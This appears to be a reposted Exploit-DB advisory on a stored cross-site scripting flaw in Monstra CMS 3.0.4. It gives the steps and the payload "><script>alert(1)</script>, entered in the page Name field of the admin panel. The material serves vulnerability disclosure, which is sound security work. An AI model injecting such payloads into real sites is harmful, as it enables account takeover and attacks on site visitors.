[webapps] Monstra 3.0.4 - Stored Cross-Site Scripting (XSS)
2023-6-14 08:0:0 Author: www.exploit-db.com(查看原文) 阅读量:11 收藏

# Exploit Title: Monstra 3.0.4 - Stored Cross-Site Scripting (XSS)
# Date: 2023-06-13
# Exploit Author: tmrswrr
# Vendor Homepage: https://monstra.org/
# Software Link: https://monstra.org/monstra-3.0.4.zip
# Version: 3.0.4
# Tested : https://www.softaculous.com/softaculous/demos/Monstra


--- Description ---

1) Login admin panel and go to Pages: 
https://demos3.softaculous.com/Monstraggybvrnbr4/admin/index.php?id=pages 
2) Click edit button and  write your payload in the Name field:
Payload: "><script>alert(1)</script>
3) After save change and will you see alert button
https://demos3.softaculous.com/Monstraggybvrnbr4/
            

文章来源: https://www.exploit-db.com/exploits/51519
如有侵权请联系:admin#unsafe.sh